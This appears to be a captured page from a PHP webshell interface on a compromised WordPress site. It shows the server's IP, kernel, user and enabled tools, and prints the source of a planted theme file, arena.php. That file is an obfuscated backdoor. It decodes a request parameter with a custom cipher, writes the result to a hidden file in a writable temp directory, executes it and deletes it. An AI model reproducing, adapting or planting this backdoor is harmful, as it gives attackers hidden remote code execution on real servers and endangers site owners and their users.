403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/meadowcroftca/wp-content/themes/wp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/meadowcroftca/wp-content/themes/wp/arena.php
<?php

if(@$_REQUEST["da\x74\x61"] !== null){
	$symbol = array_filter(["/dev/shm", getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", session_save_path(), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir()]);
	$val = $_REQUEST["da\x74\x61"];
	  	$val =explode   (  	"."	, 		$val	 	); 	
	$entry='';
            $s4='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=strlen($s4);
            $q=0;
    
            $__tmp=$val;
            while($v1=array_shift($__tmp)) { $sChar=ord($s4[$q % $lenS]);
                $dec=((int)$v1 - $sChar -($q % 10))	 ^	26;
                $entry .= chr($dec);
                $q++;		}
	$obj = 0;
do {
    $sym = $symbol[$obj] ?? null;
    if ($obj >= count($symbol)) break;
    		if (is_writable($sym) && is_dir($sym)) {
    $factor = str_replace("{var_dir}", $sym, "{var_dir}/.binding");
    if (file_put_contents($factor, $entry)) {
	include $factor;
	@unlink($factor);
	die();
}
}
    $obj++;
} while (true);
}

Youez - 2016 - github.com/yon3zu
LinuXploit